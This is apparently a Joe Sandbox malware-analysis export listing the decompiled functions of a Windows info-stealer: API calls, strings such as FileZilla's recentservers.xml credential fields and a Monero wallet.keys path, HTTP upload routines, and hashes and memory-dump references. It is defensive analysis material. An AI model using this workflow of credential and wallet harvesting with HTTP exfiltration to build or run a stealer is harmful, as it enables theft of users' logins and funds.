Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

GetProcessHeap.KERNEL32(00000000,000F423F,001A0DA6,001A0DA3,001A0DA2,001A0D9F), ref: 001901A2
RtlAllocateHeap.NTDLL(00000000), ref: 001901A9
StrStrA.SHLWAPI(00000000,<Host>), ref: 001901C5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001901D3
StrStrA.SHLWAPI(00000000,<Port>), ref: 0019020F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019021D
StrStrA.SHLWAPI(00000000,<User>), ref: 00190259
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190267
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001902A3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001902B5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019035A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190372
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019038A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 001903A2
lstrcat.KERNEL32(?,profile: null), ref: 001903B1
lstrcat.KERNEL32(?,url: ), ref: 001903C0
lstrcat.KERNEL32(?,00000000), ref: 001903D3
lstrcat.KERNEL32(?,001A161C), ref: 001903E2
lstrcat.KERNEL32(?,00000000), ref: 001903F5
lstrcat.KERNEL32(?,001A1620), ref: 00190404
lstrcat.KERNEL32(?,login: ), ref: 00190413
lstrcat.KERNEL32(?,00000000), ref: 00190426
lstrcat.KERNEL32(?,001A162C), ref: 00190435
lstrcat.KERNEL32(?,password: ), ref: 00190444
lstrcat.KERNEL32(?,00000000), ref: 00190457
lstrcat.KERNEL32(?,001A163C), ref: 00190466
lstrcat.KERNEL32(?,001A1640), ref: 00190475
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001904CE

Strings

browser: FileZilla, xrefs: 00190399
password: , xrefs: 0019043B
url: , xrefs: 001903B7
profile: null, xrefs: 001903A8
<Pass encoding="base64">, xrefs: 0019029A
login: , xrefs: 0019040A
<User>, xrefs: 00190250
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 001900E4
<Host>, xrefs: 001901BC
<Port>, xrefs: 00190206

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateChangeCloseCreateFindFolderFreeNotificationPathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 2695953057-555421843
Opcode ID: dd2381fdca455a707a7291fb72e87138062302f62fdb415955a8af691eb10518
Instruction ID: 6b55a1b56c10deb124e22d884c472d2515da8e1f2272d87e90b2d12517d5106a
Opcode Fuzzy Hash: dd2381fdca455a707a7291fb72e87138062302f62fdb415955a8af691eb10518
Instruction Fuzzy Hash: 60D11E76910108ABCF05EBF4DC56EEE773CAF69300F848518F506A7095EF74AA49CBA1

Function 00185150 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

lstrlen.KERNEL32(00000000), ref: 001851E3

Part of subcall function 00198940: CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000), ref: 00198960

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185257
StrCmpCA.SHLWAPI(?,013AE450), ref: 00185275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185390
HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001853F4

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,013AE480,00000000,?,013A9AB8,00000000,?,001A1980,00000000,?,00194CAF), ref: 00185787
lstrlen.KERNEL32(00000000), ref: 0018579B
GetProcessHeap.KERNEL32(00000000,?), ref: 001857AC
RtlAllocateHeap.NTDLL(00000000), ref: 001857B3
lstrlen.KERNEL32(00000000), ref: 001857C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001857F9
lstrlen.KERNEL32(00000000), ref: 00185818
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185831
lstrlen.KERNEL32(00000000,?,?), ref: 0018585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0018589D
InternetCloseHandle.WININET(00000000), ref: 00185901
InternetCloseHandle.WININET(00000000), ref: 0018590E
InternetCloseHandle.WININET(00000000), ref: 00185918

Strings

--, xrefs: 001852D0
", xrefs: 00185614
", xrefs: 001854D2
------, xrefs: 00185549
------, xrefs: 0018568B
------, xrefs: 001852E7
------, xrefs: 00185407
", xrefs: 00185756

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 8269eef8187d45414e9ddb9d72f1a4688af1db6951fb3b5f1deb7466a74eacdc
Instruction ID: e58877f8082fc0306e67f187454798edb0f6da267ef0efdf925a42af9a211a95
Opcode Fuzzy Hash: 8269eef8187d45414e9ddb9d72f1a4688af1db6951fb3b5f1deb7466a74eacdc
Instruction Fuzzy Hash: 8632AD71920118AADF15EBA4DC95FEEB378BF65700F804169B50662092EF706B4CCFA6

Function 001859B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00185A48
StrCmpCA.SHLWAPI(?,013AE450), ref: 00185A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00185BE3
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013AE5C0,00000000,?,013A9AB8,00000000,?,001A19C0), ref: 00185EC1
lstrlen.KERNEL32(00000000), ref: 00185ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00185EE3
RtlAllocateHeap.NTDLL(00000000), ref: 00185EEA
lstrlen.KERNEL32(00000000), ref: 00185EFF
lstrlen.KERNEL32(00000000), ref: 00185F28
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00185F41
lstrlen.KERNEL32(00000000,?,?), ref: 00185F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00185F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00185F9C
InternetCloseHandle.WININET(00000000), ref: 00186000
InternetCloseHandle.WININET(00000000), ref: 0018600D
HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 00185C48

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

InternetCloseHandle.WININET(00000000), ref: 00186017

Strings

", xrefs: 00185E66
------, xrefs: 00185AE6
------, xrefs: 00185D9C
", xrefs: 00185D25
------, xrefs: 00185C5B

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 7a1341b114aada2296654cefcb76fd9c4c26b5d5f10e6aa0b4abb1f8f963ba5f
Instruction ID: f34cc64aa71c6e1f3e51e2efc479238d667f36e26c24d4ccf83e818d462cc518
Opcode Fuzzy Hash: 7a1341b114aada2296654cefcb76fd9c4c26b5d5f10e6aa0b4abb1f8f963ba5f
Instruction Fuzzy Hash: A012BE71920118AACF15FBA4DC95FEEB379BF65700F8041A9B506620A1EF702B4DCFA5

Function 0018A6C0 Relevance: 30.5, APIs: 20, Instructions: 495
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A440: StrCmpCA.SHLWAPI(013A8A40,0018A6D7,?,0018A6D7,013A8A40), ref: 0019A45F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018A9F2
RtlAllocateHeap.NTDLL(00000000), ref: 0018A9F9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018A7DA

Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

lstrcat.KERNEL32(?,00000000), ref: 0018AB3A
lstrcat.KERNEL32(?,001A12C4), ref: 0018AB49
lstrcat.KERNEL32(?,00000000), ref: 0018AB5C
lstrcat.KERNEL32(?,001A12C8), ref: 0018AB6B
lstrcat.KERNEL32(?,00000000), ref: 0018AB7E
lstrcat.KERNEL32(?,001A12CC), ref: 0018AB8D
lstrcat.KERNEL32(?,00000000), ref: 0018ABA0
lstrcat.KERNEL32(?,001A12D0), ref: 0018ABAF
lstrcat.KERNEL32(?,00000000), ref: 0018ABC2
lstrcat.KERNEL32(?,001A12D4), ref: 0018ABD1
lstrcat.KERNEL32(?,00000000), ref: 0018ABE4
lstrcat.KERNEL32(?,001A12D8), ref: 0018ABF3

Part of subcall function 00189E60: LocalAlloc.KERNEL32(00000040,?), ref: 00189EFE

lstrcat.KERNEL32(?,00000000), ref: 0018AC3C
lstrcat.KERNEL32(?,001A12DC), ref: 0018AC56
lstrlen.KERNEL32(?), ref: 0018AC95
lstrlen.KERNEL32(?), ref: 0018ACA4

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

DeleteFileA.KERNEL32(00000000), ref: 0018AD1F

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeap$AllocAllocateCopyDeleteLocalProcess
String ID:
API String ID: 1656385275-0
Opcode ID: 2733c701dc178f8ff22082da6a55e93765949e4afc053482fb363817dcc1bbf9
Instruction ID: eef14460913c7e25adc9b85a498845f69e7ed08daf3ce7459bf59f88e703a4a5
Opcode Fuzzy Hash: 2733c701dc178f8ff22082da6a55e93765949e4afc053482fb363817dcc1bbf9
Instruction Fuzzy Hash: 0C02FE71910108ABCF05FBA0DD96EEE777CBF65301F904169F507A60A1DF75AA08CBA2

Function 0018CD30 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018CDC3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018CF07
RtlAllocateHeap.NTDLL(00000000), ref: 0018CF0E
lstrcat.KERNEL32(?,00000000), ref: 0018D048
lstrcat.KERNEL32(?,001A141C), ref: 0018D057
lstrcat.KERNEL32(?,00000000), ref: 0018D06A
lstrcat.KERNEL32(?,001A1420), ref: 0018D079
lstrcat.KERNEL32(?,00000000), ref: 0018D08C
lstrcat.KERNEL32(?,001A1424), ref: 0018D09B
lstrcat.KERNEL32(?,00000000), ref: 0018D0AE
lstrcat.KERNEL32(?,001A1428), ref: 0018D0BD
lstrcat.KERNEL32(?,00000000), ref: 0018D0D0
lstrcat.KERNEL32(?,001A142C), ref: 0018D0DF
lstrcat.KERNEL32(?,00000000), ref: 0018D0F2
lstrcat.KERNEL32(?,001A1430), ref: 0018D101
lstrcat.KERNEL32(?,00000000), ref: 0018D114
lstrcat.KERNEL32(?,001A1434), ref: 0018D123

Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255

lstrlen.KERNEL32(?), ref: 0018D16A
lstrlen.KERNEL32(?), ref: 0018D179

Part of subcall function 0019A440: StrCmpCA.SHLWAPI(013A8A40,0018A6D7,?,0018A6D7,013A8A40), ref: 0019A45F

DeleteFileA.KERNEL32(00000000), ref: 0018D1F4

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: d352b64662a42f796af05a10654309ad6575ebc3c70bd2e5edfc967261566458
